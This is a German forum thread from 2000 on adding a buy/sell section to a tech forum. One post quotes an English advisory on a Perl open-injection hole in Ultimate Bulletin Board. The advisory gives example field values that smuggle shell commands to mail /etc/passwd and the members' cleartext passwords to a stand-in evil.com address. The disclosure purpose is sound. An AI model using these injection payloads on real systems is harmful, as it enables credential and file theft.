Marktplatz: Suche/Biete

07.05.2000, 23:44

Was haltet ihr von folgender Variante: Im Forum werden die Rubriken 'Biete' und 'Suche' geöffnet. Dort können aber nur von registrierten und zusätzlich von uns ermächtigten (auch Passwort könnte man machen) Teilnehmern Angebote hineingestellt werden. Lesbar natürlich für alle.
Zusätzlich könnte man die Einträge auch in die regulären 'anna' Kleinanzeigen übernehmen (möglichst viele 'views' sind ja trotz allem erwünscht.

Bitte um Kommentare!

Neutron · 08.05.2000, 00:49

Ja ja, nur her damit. Nur das mit dem Passwort ist mir nicht ganz klar, als registrierter Benutzer hat man doch eh schon eins, bzw. um Beiträge zu starten brauchte man eh schon immer eins.
mfg
Christof

------------------
"Wo ein Wille ist, ist auch ein oder..."

wol · 08.05.2000, 00:53

Na klar, gute Idee!
Aber wozu noch ein Passwort?
MfG. wol

08.05.2000, 01:28

ad noch ein passwort: Würde die Möglichkeit bieten noch strengere Kriterien anzulegen, da am WCM-Forum ja jeder teilnehmen kann. Soll heissen: auch kommerzielle Unternehmen können als solche im WCM-Forum Teilnehmer sein. Bei den Kleinanzeigen wollt ihr das ja vermeiden, oder?

Philipp · 08.05.2000, 05:19

Die Funktion mit den extra Passwort bietet UBB nur in privaten Foren.

Die Rubriken Biete und Suche könnte ja Moderiert werden und falls jemand diese Rubriken wirklich missbrauch (Kommerzielle Werbung) kann er ja gebannt werden.

Ausserdem (Off Topic) sollte die Boardsoftware aktualisiert werden da sie ein großes Sicherheitloch hat. Ich habe schon öfter darauf hingewiesen

Hier die genaue Beschreibung des Sicherheitslochs.

Wie es aber genau funktioniert poste ich nicht, da sich sonst alle womöglich Morgen via FTP einloggen

.

<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Hello.

Writing cgi scripts in perl is simple. It's also rather safe,
providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-
made scripts, but rather commercial software product. Hey, said I to
myself, remember those story about pcweek hack ? They use commercial
package photoads. Let's look what that Ultimate Bulletin Board by
Infopop is.

I grabbed freeware version from http://www.ultimatebb.com and
after 10-minutes grepping found those lines:

ubb_library.pl:

*** Gelöscht ***

And the * Gelöscht * takes its value directly from the hidden (hmm!)
field `* Gelöscht *'.

So when I filled the form with
* Gelöscht *='012345****|mail hacker@evil.com </etc/passwd|'
It happily gives me /etc/passwd. And
* Gelöscht *='012345****|cat Members/*|mail hacker@evil.org|'
shows all users of bulletin board, and their passwords too (in cleartext!).

So one should only open * Gelöscht *,
and set * Gelöscht * field to whatever he want. And this stupid UBB (at least
freeware version) doesn't keep the logs (unless, so-called, hacklog,
used when the condition above is not met).

The fix is obvious. But the rule of the thumb is "do not use magic perl open".
At least in cgi scripts. If you want to open regular file, sysopen does
the trick as well.

And again: CHECK EVERYTHING!

Regards,
SerG.

P.S. Vendor was notified.
<HR></BLOCKQUOTE>

Dieses Sicherheitsloch besteht in allen UBBs bis 5.43d und nicht nur in der Freeware Version. Ich habe es selbst auf meinen Board miterlebt.

[Diese Nachricht wurde von Philipp am 08. Mai 2000 editiert.]

Sonic · 08.05.2000, 11:15

HI!

Also ein Suche/Biete abschnitt währe toll!

Habe genug das sich verkaufen lässt und bei mir nur sinnlos herummsteht!

Aber das mit einer extra Anmeldung/Passwort finde ich überflüssig!

------------------
MfG

Sonic

spunz · 08.05.2000, 13:49

ja supa her damit!!!!!!!!

jjsollte meiner meinung nach ein normales forum sein, wo reg. abenutzter normal posten können.

zum ubb update: wäre sicher nicht schlecht, bleiben die benutzer erhalten?

spunz

spunz · 08.05.2000, 13:57

ach ja, wenns so weiter geht wird im forum bald der 1000. benutzer gefeiert

spunz

TheMixer · 09.05.2000, 10:41

Na und wann kommt das Biete/Suche Dingsi nun endlich?? Wüßte ein paar Dinge, die ich 2nd hand kaufen würd wenns einen vernünftigen (sprich angemessenen) Preis dafür gibt... und maybe hab ich ja auch a bissi was anzubieten

tm, such- und bietsüchtig

Authentic · 09.05.2000, 21:07

Ich glaube nicht, daß ein zweites Paßwort erforderlich ist. Im Ernstfall kann man es ja immer noch nachträglich einführen.
Es wird endlich Zeit für das Suche/Biete Forum. Bin schon ganz gierig drauf, denn ich suche ein Board für einen P1.

------------------
Gruß Authentic

07.05.2000, 23:44	#1
tom Gast Beiträge: n/a	Was haltet ihr von folgender Variante: Im Forum werden die Rubriken 'Biete' und 'Suche' geöffnet. Dort können aber nur von registrierten und zusätzlich von uns ermächtigten (auch Passwort könnte man machen) Teilnehmern Angebote hineingestellt werden. Lesbar natürlich für alle. Zusätzlich könnte man die Einträge auch in die regulären 'anna' Kleinanzeigen übernehmen (möglichst viele 'views' sind ja trotz allem erwünscht. Bitte um Kommentare!

08.05.2000, 00:49	#2
Neutron Abonnent Registriert seit: 11.10.1999 Alter: 47 Beiträge: 847	Ja ja, nur her damit. Nur das mit dem Passwort ist mir nicht ganz klar, als registrierter Benutzer hat man doch eh schon eins, bzw. um Beiträge zu starten brauchte man eh schon immer eins. mfg Christof ------------------ "Wo ein Wille ist, ist auch ein oder..."

08.05.2000, 00:53	#3
wol Inventar Registriert seit: 04.02.2000 Beiträge: 2.488	Na klar, gute Idee! Aber wozu noch ein Passwort? MfG. wol

08.05.2000, 01:28	#4
tom Gast Beiträge: n/a	ad noch ein passwort: Würde die Möglichkeit bieten noch strengere Kriterien anzulegen, da am WCM-Forum ja jeder teilnehmen kann. Soll heissen: auch kommerzielle Unternehmen können als solche im WCM-Forum Teilnehmer sein. Bei den Kleinanzeigen wollt ihr das ja vermeiden, oder?

08.05.2000, 05:19	#5
Philipp verXENt Registriert seit: 01.08.1999 Beiträge: 7.084 Mein Computer	Die Funktion mit den extra Passwort bietet UBB nur in privaten Foren. Die Rubriken Biete und Suche könnte ja Moderiert werden und falls jemand diese Rubriken wirklich missbrauch (Kommerzielle Werbung) kann er ja gebannt werden. Ausserdem (Off Topic) sollte die Boardsoftware aktualisiert werden da sie ein großes Sicherheitloch hat. Ich habe schon öfter darauf hingewiesen Hier die genaue Beschreibung des Sicherheitslochs. Wie es aber genau funktioniert poste ich nicht, da sich sonst alle womöglich Morgen via FTP einloggen . <BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Hello. Writing cgi scripts in perl is simple. It's also rather safe, providing authors follow very simple instructions. But they don't. Browsing some site, I found that their forums were based not on home- made scripts, but rather commercial software product. Hey, said I to myself, remember those story about pcweek hack ? They use commercial package photoads. Let's look what that Ultimate Bulletin Board by Infopop is. I grabbed freeware version from http://www.ultimatebb.com and after 10-minutes grepping found those lines: ubb_library.pl: * Gelöscht * And the * Gelöscht * takes its value directly from the hidden (hmm!) field `* Gelöscht '. So when I filled the form with Gelöscht ='012345**\|mail hacker@evil.com </etc/passwd\|' It happily gives me /etc/passwd. And Gelöscht ='012345**\|cat Members/\|mail hacker@evil.org\|' shows all users of bulletin board, and their passwords too (in cleartext!). So one should only open * Gelöscht , and set Gelöscht * field to whatever he want. And this stupid UBB (at least freeware version) doesn't keep the logs (unless, so-called, hacklog, used when the condition above is not met). The fix is obvious. But the rule of the thumb is "do not use magic perl open". At least in cgi scripts. If you want to open regular file, sysopen does the trick as well. And again: CHECK EVERYTHING! Regards, SerG. P.S. Vendor was notified. <HR></BLOCKQUOTE> Dieses Sicherheitsloch besteht in allen UBBs bis 5.43d und nicht nur in der Freeware Version. Ich habe es selbst auf meinen Board miterlebt. [Diese Nachricht wurde von Philipp am 08. Mai 2000 editiert.]

08.05.2000, 11:15	#6
Sonic Master Registriert seit: 28.03.2000 Alter: 45 Beiträge: 691	HI! Also ein Suche/Biete abschnitt währe toll! Habe genug das sich verkaufen lässt und bei mir nur sinnlos herummsteht! Aber das mit einer extra Anmeldung/Passwort finde ich überflüssig! ------------------ MfG Sonic

08.05.2000, 13:49	#7
spunz Super-Moderator Registriert seit: 22.03.2000 Beiträge: 9.666	ja supa her damit!!!!!!!! jjsollte meiner meinung nach ein normales forum sein, wo reg. abenutzter normal posten können. zum ubb update: wäre sicher nicht schlecht, bleiben die benutzer erhalten? spunz

08.05.2000, 13:57	#8
spunz Super-Moderator Registriert seit: 22.03.2000 Beiträge: 9.666	ach ja, wenns so weiter geht wird im forum bald der 1000. benutzer gefeiert spunz

09.05.2000, 10:41	#9
TheMixer Veteran Registriert seit: 14.09.1999 Beiträge: 231	Na und wann kommt das Biete/Suche Dingsi nun endlich?? Wüßte ein paar Dinge, die ich 2nd hand kaufen würd wenns einen vernünftigen (sprich angemessenen) Preis dafür gibt... und maybe hab ich ja auch a bissi was anzubieten tm, such- und bietsüchtig

09.05.2000, 21:07	#10
Authentic Hero Registriert seit: 19.01.2000 Beiträge: 899 Mein Computer	Ich glaube nicht, daß ein zweites Paßwort erforderlich ist. Im Ernstfall kann man es ja immer noch nachträglich einführen. Es wird endlich Zeit für das Suche/Biete Forum. Bin schon ganz gierig drauf, denn ich suche ein Board für einen P1. ------------------ Gruß Authentic

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)